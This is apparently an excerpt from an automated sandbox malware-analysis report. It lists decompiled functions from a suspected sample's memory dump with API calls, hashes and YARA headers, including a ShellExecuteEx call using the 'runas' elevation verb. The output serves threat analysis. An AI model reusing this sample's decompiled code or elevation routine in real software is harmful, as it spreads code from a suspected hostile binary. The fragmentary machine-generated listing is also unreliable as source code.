                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RegisterAutomation$vcltest3.dll
                                                    • API String ID: 0-2963190186
                                                    • Opcode ID: 81692a346c510cd3cab428a03d42892663644badc2aea56474423a5a3e502603
                                                    • Instruction ID: 239074f197e96bcf26dda039fa981a1902ebc25ef421ca5b27d2001906572362
                                                    • Opcode Fuzzy Hash: 81692a346c510cd3cab428a03d42892663644badc2aea56474423a5a3e502603
                                                    • Instruction Fuzzy Hash: A4E13C36A04205EFDB40DB69C585A9EB7B5BF04315F2481ABE804DB353C738EE49DB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 54%
                                                    			E004730FC(signed int __eax, void* __ebx, int __edx, void* __edi, void* __esi) {
                                                    				struct _ITEMIDLIST* _v8;
                                                    				char _v12;
                                                    				char _v273;
                                                    				char _v280;
                                                    				char _v296;
                                                    				char _v300;
                                                    				char _v304;
                                                    				char _v308;
                                                    				signed int _t29;
                                                    				int _t59;
                                                    				int _t63;
                                                    				intOrPtr* _t81;
                                                    				signed int _t84;
                                                    				int _t91;
                                                    				intOrPtr _t93;
                                                    				intOrPtr _t100;
                                                    				intOrPtr* _t108;
                                                    				void* _t110;
                                                    				void* _t111;
                                                    				intOrPtr _t112;
                                                    
                                                    				_t91 = __edx;
                                                    				_t29 = __eax;
                                                    				_t110 = _t111;
                                                    				_t112 = _t111 + 0xfffffed0;
                                                    				_v308 = 0;
                                                    				_v304 = 0;
                                                    				_v300 = 0;
                                                    				_v280 = 0;
                                                    				_t81 = __edx;
                                                    				_push(_t110);
                                                    				_push(0x473306);
                                                    				_push( *[fs:ecx]);
                                                    				 *[fs:ecx] = _t112;
                                                    				_t84 = __eax;
                                                    				if(__eax > 6) {
                                                    					L8:
                                                    					if(_t29 != 7) {
                                                    						SHGetSpecialFolderLocation(0, _t91,  &_v8); // executed
                                                    						SHGetPathFromIDList(_v8,  &_v273);
                                                    						E0040A174( &_v273, _t81);
                                                    					} else {
                                                    						_push(_t110);
                                                    						_push(0x4732a8);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t112;
                                                    						E00472EF0( &_v280, _t81, _t84, 0);
                                                    						E00404DCC(_v280, 0x47331c);
                                                    						if(0 == 0) {
                                                    							SHGetSpecialFolderLocation(0, 5,  &_v8);
                                                    							SHGetPathFromIDList(_v8,  &_v273);
                                                    							E0040A174( &_v273,  &_v300);
                                                    							L00409D30(_v300, _t81);
                                                    							E00404CCC( &_v304, "\\Downloads",  *_t81);
                                                    							_t59 = E00409A58(_v304);
                                                    							__eflags = _t59;
                                                    							if(_t59 == 0) {
                                                    								E00404CCC( &_v308, 0x473390,  *_t81);
                                                    								_t63 = E00409A58(_v308);
                                                    								__eflags = _t63;
                                                    								if(_t63 == 0) {
                                                    									E004049C0(_t81);
                                                    								} else {
                                                    									E00404C88(_t81, 0x473390);
                                                    								}
                                                    							} else {
                                                    								E00404C88(_t81, "\\Downloads");
                                                    							}
                                                    						} else {
                                                    							_t108 = GetProcAddress(LoadLibraryA("shell32.dll"), "SHGetKnownFolderPath");
                                                    							E00408CA8("{374DE290-123F-4565-9164-39C4925E467B}", _t81,  &_v296, _t108, 0);
                                                    							 *_t108( &_v296, 0, 0,  &_v12);
                                                    							E00404BE8(_t81, _v12);
                                                    						}
                                                    						_pop(_t100);
                                                    						 *[fs:eax] = _t100;
                                                    					}
                                                    					_pop(_t93);
                                                    					 *[fs:eax] = _t93;
                                                    					_push(0x47330d);
                                                    					E004049E4( &_v308, 3);
                                                    					return E004049C0( &_v280);
                                                    				}
                                                    				switch( *((intOrPtr*)(__eax * 4 +  &M00473140))) {
                                                    					case 0:
                                                    						goto L8;
                                                    					case 1:
                                                    						_t91 = 0x1a;
                                                    						goto L8;
                                                    					case 2:
                                                    						__edx = 0x1c;
                                                    						goto L8;
                                                    					case 3:
                                                    						__edx = 0x23;
                                                    						goto L8;
                                                    					case 4:
                                                    						__edx = 0x2e;
                                                    						goto L8;
                                                    					case 5:
                                                    						__edx = 5;
                                                    						goto L8;
                                                    					case 6:
                                                    						__edx = 0;
                                                    						__eflags = 0;
                                                    						goto L8;
                                                    				}
                                                    			}

                                                    Instruction address column for E004730FC (detached from the decompiled listing above during extraction): addresses span 0x004730fc to 0x00473305; entries of 0x00000000 mark lines with no mapped instruction.

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(shell32.dll,00000000,004732A8,?,00000000,00473306), ref: 004731BA
                                                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 004731C7
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00473206
                                                    • SHGetPathFromIDList.SHELL32(?,?), ref: 00473216
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressFolderFromLibraryListLoadLocationPathProcSpecial
                                                    • String ID: SHGetKnownFolderPath$\Downloads$shell32.dll${374DE290-123F-4565-9164-39C4925E467B}
                                                    • API String ID: 2341558874-1676591009
                                                    • Opcode ID: ceb5cd3c2f7c68d7676a2a85ae2993d6271a5020a26987a0caa0ce5203d03466
                                                    • Instruction ID: 6a38066a99e998b0feb9dfcd70d0f28be743192f9ebabe66a089855190f33de3
                                                    • Opcode Fuzzy Hash: ceb5cd3c2f7c68d7676a2a85ae2993d6271a5020a26987a0caa0ce5203d03466
                                                    • Instruction Fuzzy Hash: 9741C970B04118ABD720EF65DC42BDE73B9EB48705F5084BBB90CA7681DA3C9F419A1E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    C-Code - Quality: 61%
                                                    			E004062DC() {
                                                    				void* _t28;
                                                    				void* _t30;
                                                    				struct HINSTANCE__* _t36;
                                                    				struct HINSTANCE__* _t42;
                                                    				char* _t51;
                                                    				void* _t52;
                                                    				struct HINSTANCE__* _t59;
                                                    				void* _t61;
                                                    
                                                    				_push(0x105);
                                                    				_push( *((intOrPtr*)(_t61 - 4)));
                                                    				_push(_t61 - 0x11d);
                                                    				L0040131C();
                                                    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                                                    				_t59 = 0;
                                                    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                                                    					L14:
                                                    					return _t59;
                                                    				} else {
                                                    					_t28 = _t61 - 0x11d;
                                                    					_push(_t28);
                                                    					L00401324();
                                                    					_t51 = _t28 + _t61 - 0x11d;
                                                    					L5:
                                                    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                                                    						_t51 = _t51 - 1;
                                                    						goto L5;
                                                    					}
                                                    					_t30 = _t61 - 0x11d;
                                                    					if(_t51 != _t30) {
                                                    						_t52 = _t51 + 1;
                                                    						if( *((char*)(_t61 - 0x12)) != 0) {
                                                    							_push(0x105 - _t52 - _t30);
                                                    							_push(_t61 - 0x12);
                                                    							_push(_t52);
                                                    							L0040131C();
                                                    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                                                    						}
                                                    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                                                    							_push(0x105 - _t52 - _t61 - 0x11d);
                                                    							_push(_t61 - 0xd);
                                                    							_push(_t52);
                                                    							L0040131C();
                                                    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                    							_t59 = _t36;
                                                    							if(_t59 == 0) {
                                                    								 *((char*)(_t61 - 0xb)) = 0;
                                                    								_push(0x105 - _t52 - _t61 - 0x11d);
                                                    								_push(_t61 - 0xd);
                                                    								_push(_t52);
                                                    								L0040131C();
                                                    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                    								_t59 = _t42;
                                                    							}
                                                    						}
                                                    					}
                                                    					goto L14;
                                                    				}
                                                    			}

                                                    APIs
                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                    • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                    • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                    • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                    • API String ID: 1599918012-2375825460
                                                    • Opcode ID: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                    • Instruction ID: b1d3fb610801afc069037103d2f87a16e6e0ad9f86a4084b42d9068a75e18736
                                                    • Opcode Fuzzy Hash: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                    • Instruction Fuzzy Hash: 20319171E0025C6AFB26D6B89C46BDF7BAC8B44344F4501F7AA05F61C2E6788E848B94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E00473490(intOrPtr __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __eflags, char _a4, char _a8) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				void* _v16;
                                                    				intOrPtr _v44;
                                                    				intOrPtr _v52;
                                                    				intOrPtr _v56;
                                                    				intOrPtr _v60;
                                                    				intOrPtr _v64;
                                                    				intOrPtr _v68;
                                                    				char _v72;
                                                    				char* _t33;
                                                    				intOrPtr _t43;
                                                    				intOrPtr _t52;
                                                    				void* _t56;
                                                    
                                                    				_v12 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t43 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t56);
                                                    				_push(0x473564);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t56 + 0xffffffbc;
                                                    				E004032B4( &_v72, 0x3c);
                                                    				_v72 = 0x3c;
                                                    				_v64 = _t43;
                                                    				_v68 = 0x440;
                                                    				_v56 = E00404E80(_v8);
                                                    				if(_a8 != 0) {
                                                    					_v60 = 0x473574;
                                                    				}
                                                    				if(_v12 != 0) {
                                                    					_v52 = E00404E80(_v12);
                                                    				}
                                                    				_v44 = 1;
                                                    				_t33 =  &_v72;
                                                    				_push(_t33); // executed
                                                    				L0042EC28(); // executed
                                                    				if(_t33 != 0) {
                                                    					if(_a4 != 0 && _v16 != 0) {
                                                    						while(WaitForSingleObject(_v16, 0x32) == 0x102) {
                                                    							Sleep(0x32);
                                                    						}
                                                    					}
                                                    				}
                                                    				_pop(_t52);
                                                    				 *[fs:eax] = _t52;
                                                    				_push(0x47356b);
                                                    				return E004049E4( &_v12, 2);
                                                    			}

                                                    APIs
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00473512
                                                    • Sleep.KERNEL32(00000032,00000000,00000032,00000000,00473564), ref: 0047352B
                                                    • WaitForSingleObject.KERNEL32(00000000,00000032,00000000,00473564), ref: 00473536
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteObjectShellSingleSleepWait
                                                    • String ID: <$runas
                                                    • API String ID: 3175876650-1187129395
                                                    • Opcode ID: d2f4098c0599bc8fe6b33f95c7c42db526a5f4d83c62203c5c16265f54e5b256
                                                    • Instruction ID: 5aa402594196cc22e358d2c9fc2044dae5621586ffdb0388778a4eaf1ff726ef
                                                    • Opcode Fuzzy Hash: d2f4098c0599bc8fe6b33f95c7c42db526a5f4d83c62203c5c16265f54e5b256
                                                    • Instruction Fuzzy Hash: BC217FB0904208BBDB15DFAAD486BDEBBB8EB04304F50807BF508A6291D77C9B45DB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004099E0(void* __eax) {
                                                    				short _v6;
                                                    				short _v8;
                                                    				struct _FILETIME _v16;
                                                    				struct _WIN32_FIND_DATAA _v336;
                                                    				void* _t16;
                                                    
                                                    				_t16 = FindFirstFileA(E00404E80(__eax),  &_v336); // executed
                                                    				if(_t16 == 0xffffffff) {
                                                    					L3:
                                                    					_v8 = 0xffffffff;
                                                    				} else {
                                                    					FindClose(_t16);
                                                    					if((_v336.dwFileAttributes & 0x00000010) != 0) {
                                                    						goto L3;
                                                    					} else {
                                                    						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
                                                    						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
                                                    							goto L3;
                                                    						}
                                                    					}
                                                    				}
                                                    				return _v8;
                                                    			}

                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 004099FB
                                                    • FindClose.KERNEL32(00000000,00000000,?), ref: 00409A06
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00409A1F
                                                    • FileTimeToDosDateTime.KERNEL32 ref: 00409A30
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileTime$Find$CloseDateFirstLocal
                                                    • String ID:
                                                    • API String ID: 2659516521-0
                                                    • Opcode ID: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                    • Instruction ID: bf488b194f2b476f169b407b0835a29ee4c7e870b59a6eb425f81542ff1916d2
                                                    • Opcode Fuzzy Hash: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                    • Instruction Fuzzy Hash: 6CF01871D0024CA6CB11DAE58C85ACFB3AC5F04324F1047B7B519F21D2EA389F049B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 91%
                                                    			E0043F118(void* __eax, intOrPtr* __edx) {
                                                    				char _v20;
                                                    				char _v28;
                                                    				void* __edi;
                                                    				intOrPtr _t17;
                                                    				void* _t19;
                                                    				void* _t21;
                                                    				void* _t23;
                                                    				void* _t32;
                                                    				void* _t39;
                                                    				void* _t45;
                                                    				intOrPtr _t47;
                                                    				intOrPtr _t48;
                                                    				void* _t50;
                                                    				void* _t51;
                                                    				void* _t65;
                                                    				intOrPtr* _t66;
                                                    				intOrPtr* _t68;
                                                    				void* _t69;
                                                    
                                                    				_t68 = __edx;
                                                    				_t50 = __eax;
                                                    				_t17 =  *__edx;
                                                    				_t69 = _t17 - 0x84;
                                                    				if(_t69 > 0) {
                                                    					_t19 = _t17 + 0xffffff00 - 9;
                                                    					if(_t19 < 0) {
                                                    						_t21 = E0043B6EC(__eax);
                                                    						if(_t21 != 0) {
                                                    							L28:
                                                    							return _t21;
                                                    						}
                                                    						L27:
                                                    						_t23 = E0043C1FC(_t50, _t68); // executed
                                                    						return _t23;
                                                    					}
                                                    					if(_t19 + 0xffffff09 - 0xb < 0) {
                                                    						_t21 = E0043F084(__eax, _t51, __edx);
                                                    						if(_t21 == 0) {
                                                    							goto L27;
                                                    						}
                                                    						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
                                                    							goto L28;
                                                    						}
                                                    						_t21 = L00441A08(_t50);
                                                    						if(_t21 == 0) {
                                                    							goto L28;
                                                    						}
                                                    						_push( *((intOrPtr*)(_t68 + 8)));
                                                    						_push( *((intOrPtr*)(_t68 + 4)));
                                                    						_push( *_t68);
                                                    						_t32 = E00441704(_t50);
                                                    						_push(_t32);
                                                    						L00407540();
                                                    						return _t32;
                                                    					}
                                                    					goto L27;
                                                    				}
                                                    				if(_t69 == 0) {
                                                    					_t21 = E0043C1FC(__eax, __edx);
                                                    					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                                                    						goto L28;
                                                    					}
                                                    					L00407A50( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
                                                    					E0043AAC0(_t50,  &_v28,  &_v20);
                                                    					_t21 = E0043EFF0(_t50, 0,  &_v28, _t65, 0);
                                                    					if(_t21 == 0) {
                                                    						goto L28;
                                                    					}
                                                    					 *((intOrPtr*)(_t68 + 0xc)) = 1;
                                                    					return _t21;
                                                    				}
                                                    				_t39 = _t17 - 7;
                                                    				if(_t39 == 0) {
                                                    					_t66 = L004519E0(__eax);
                                                    					if(_t66 == 0) {
                                                    						goto L27;
                                                    					}
                                                    					_t21 =  *((intOrPtr*)( *_t66 + 0xe8))();
                                                    					if(_t21 == 0) {
                                                    						goto L28;
                                                    					}
                                                    					goto L27;
                                                    				}
                                                    				_t21 = _t39 - 1;
                                                    				if(_t21 == 0) {
                                                    					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                                                    						goto L28;
                                                    					}
                                                    				} else {
                                                    					if(_t21 == 0x17) {
                                                    						_t45 = E00441704(__eax);
                                                    						if(_t45 == GetCapture() &&  *0x49bce0 != 0) {
                                                    							_t47 =  *0x49bce0; // 0x0
                                                    							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                                                    								_t48 =  *0x49bce0; // 0x0
                                                    								E0043C130(_t48, 0, 0x1f, 0);
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Capture
                                                    • String ID:
                                                    • API String ID: 1145282425-3916222277
                                                    • Opcode ID: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                    • Instruction ID: 937a996b5d7fc64cee9df4cbb2c234063ab2d53f9f2184138994f8e7c5ea39be
                                                    • Opcode Fuzzy Hash: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                    • Instruction Fuzzy Hash: 6331A235A04A00C7DA20AA6DC985B1B2284AB4D358F14667FB486C7393CA7ECC0D874D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 77%
                                                    			E00446564(void* __ecx, void* __edi, void* __esi) {
                                                    				intOrPtr _t6;
                                                    				intOrPtr _t8;
                                                    				intOrPtr _t10;
                                                    				intOrPtr _t12;
                                                    				intOrPtr _t14;
                                                    				void* _t16;
                                                    				void* _t17;
                                                    				intOrPtr _t20;
                                                    				intOrPtr _t21;
                                                    				intOrPtr _t22;
                                                    				intOrPtr _t23;
                                                    				intOrPtr _t28;
                                                    
                                                    				_t25 = __esi;
                                                    				_t17 = __ecx;
                                                    				_push(_t28);
                                                    				_push(0x4465ea);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t28;
                                                    				 *0x49eb20 =  *0x49eb20 - 1;
                                                    				if( *0x49eb20 < 0) {
                                                    					 *0x49eb1c = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
                                                    					_t31 =  *0x49eb1c;
                                                    					E00446330(_t16, __edi,  *0x49eb1c);
                                                    					_t6 =  *0x436dd0; // 0x436e1c
                                                    					E0041A4A8(_t6, _t16, _t17,  *0x49eb1c);
                                                    					_t8 =  *0x436dd0; // 0x436e1c
                                                    					E0041A548(_t8, _t16, _t17, _t31);
                                                    					_t21 =  *0x436dd0; // 0x436e1c
                                                    					_t10 =  *0x447948; // 0x447994
                                                    					E0041A4F4(_t10, _t16, _t21, __esi, _t31);
                                                    					_t22 =  *0x436dd0; // 0x436e1c
                                                    					_t12 =  *0x4465f4; // 0x446640
                                                    					E0041A4F4(_t12, _t16, _t22, __esi, _t31);
                                                    					_t23 =  *0x436dd0; // 0x436e1c
                                                    					_t14 =  *0x44675c; // 0x4467a8
                                                    					E0041A4F4(_t14, _t16, _t23, _t25, _t31);
                                                    				}
                                                    				_pop(_t20);
                                                    				 *[fs:eax] = _t20;
                                                    				_push(0x4465f1);
                                                    				return 0;
                                                    			}

                                                    APIs
                                                    • GetVersion.KERNEL32(00000000,004465EA), ref: 0044657E
                                                      • Part of subcall function 00446330: GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                      • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 00446384
                                                      • Part of subcall function 00446330: GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                      • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                      • Part of subcall function 00446330: RegisterClipboardFormatA.USER32 ref: 004463EB
                                                      • Part of subcall function 00446330: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                      • Part of subcall function 00446330: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                    • String ID: @fD
                                                    • API String ID: 3775504709-3452771706
                                                    • Opcode ID: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                    • Instruction ID: a2d0d9fa5674fa572cfd9e012cd62e1639ea6f2d0861d92eee2e079839ffb759
                                                    • Opcode Fuzzy Hash: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                    • Instruction Fuzzy Hash: FBF04F78214241AFE305FF2AFC5291937A4FB86314792947AF400436A6CA3CA851CB0E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0043C1FC(intOrPtr* __eax, signed int* __edx) {
                                                    				signed int _v12;
                                                    				short _v14;
                                                    				char _v16;
                                                    				signed int _v20;
                                                    				intOrPtr* _v24;
                                                    				char _v280;
                                                    				signed int _t39;
                                                    				signed int _t40;
                                                    				signed int _t46;
                                                    				intOrPtr* _t47;
                                                    				signed int _t50;
                                                    				signed int _t53;
                                                    				intOrPtr _t55;
                                                    				intOrPtr _t56;
                                                    				signed int _t67;
                                                    				signed int _t68;
                                                    				void* _t73;
                                                    				signed int* _t79;
                                                    				intOrPtr _t90;
                                                    				intOrPtr* _t96;
                                                    
                                                    				_t79 = __edx;
                                                    				_t96 = __eax;
                                                    				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
                                                    					L4:
                                                    					_t39 =  *_t79;
                                                    					if(_t39 < 0x100 || _t39 > 0x108) {
                                                    						_t40 =  *_t79;
                                                    						__eflags = _t40 - 0x200;
                                                    						if(_t40 < 0x200) {
                                                    							L30:
                                                    							__eflags = _t40 - 0xb00b;
                                                    							if(_t40 == 0xb00b) {
                                                    								E0043AB1C(_t96, _t79[1], _t40, _t79[2]);
                                                    							}
                                                    							L32:
                                                    							return  *((intOrPtr*)( *_t96 - 0x14))();
                                                    						}
                                                    						__eflags = _t40 - 0x20a;
                                                    						if(_t40 > 0x20a) {
                                                    							goto L30;
                                                    						}
                                                    						__eflags =  *(_t96 + 0x50) & 0x00000080;
                                                    						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
                                                    							L16:
                                                    							_t46 =  *_t79 - 0x200;
                                                    							__eflags = _t46;
                                                    							if(__eflags == 0) {
                                                    								L21:
                                                    								_t47 =  *0x49dbcc; // 0x49ebb8
                                                    								E0045B21C( *_t47, _t79, _t96, __eflags);
                                                    								goto L32;
                                                    							}
                                                    							_t50 = _t46 - 1;
                                                    							__eflags = _t50;
                                                    							if(_t50 == 0) {
                                                    								L22:
                                                    								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
                                                    								if(__eflags != 0) {
                                                    									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
                                                    									goto L32;
                                                    								}
                                                    								return L00403DE8(_t96, __eflags);
                                                    							}
                                                    							_t53 = _t50 - 1;
                                                    							__eflags = _t53;
                                                    							if(_t53 == 0) {
                                                    								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
                                                    								goto L32;
                                                    							}
                                                    							__eflags = _t53 == 1;
                                                    							if(_t53 == 1) {
                                                    								goto L22;
                                                    							}
                                                    							_t55 =  *0x49eb18; // 0x0
                                                    							__eflags =  *((char*)(_t55 + 0x20));
                                                    							if( *((char*)(_t55 + 0x20)) == 0) {
                                                    								goto L32;
                                                    							} else {
                                                    								_t56 =  *0x49eb18; // 0x0
                                                    								__eflags =  *(_t56 + 0x1c);
                                                    								if( *(_t56 + 0x1c) == 0) {
                                                    									goto L32;
                                                    								}
                                                    								_t90 =  *0x49eb18; // 0x0
                                                    								__eflags =  *_t79 -  *((intOrPtr*)(_t90 + 0x1c));
                                                    								if( *_t79 !=  *((intOrPtr*)(_t90 + 0x1c))) {
                                                    									goto L32;
                                                    								}
                                                    								GetKeyboardState( &_v280);
                                                    								_v20 =  *_t79;
                                                    								_v16 = L00451924( &_v280);
                                                    								_v14 = _t79[1];
                                                    								_v12 = _t79[2];
                                                    								return L00403DE8(_t96, __eflags);
                                                    							}
                                                    							goto L21;
                                                    						}
                                                    						_t67 = _t40 - 0x203;
                                                    						__eflags = _t67;
                                                    						if(_t67 == 0) {
                                                    							L15:
                                                    							 *_t79 =  *_t79 - 2;
                                                    							__eflags =  *_t79;
                                                    							goto L16;
                                                    						}
                                                    						_t68 = _t67 - 3;
                                                    						__eflags = _t68;
                                                    						if(_t68 == 0) {
                                                    							goto L15;
                                                    						}
                                                    						__eflags = _t68 != 3;
                                                    						if(_t68 != 3) {
                                                    							goto L16;
                                                    						}
                                                    						goto L15;
                                                    					}
                                                    					_v24 = L004519E0(_t96);
                                                    					if(_v24 == 0) {
                                                    						goto L32;
                                                    					}
                                                    					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
                                                    					if(_t73 == 0) {
                                                    						goto L32;
                                                    					}
                                                    				} else {
                                                    					_v24 = L004519E0(__eax);
                                                    					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
                                                    						goto L4;
                                                    					} else {
                                                    						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
                                                    						if(_t73 == 0) {
                                                    							goto L4;
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t73;
                                                    			}
                                                    0x0043c2b5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c2b5
                                                    0x0043c25f
                                                    0x0043c266
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c275
                                                    0x0043c27d
                                                    0x00000000
                                                    0x0043c283
                                                    0x0043c212
                                                    0x0043c219
                                                    0x0043c220
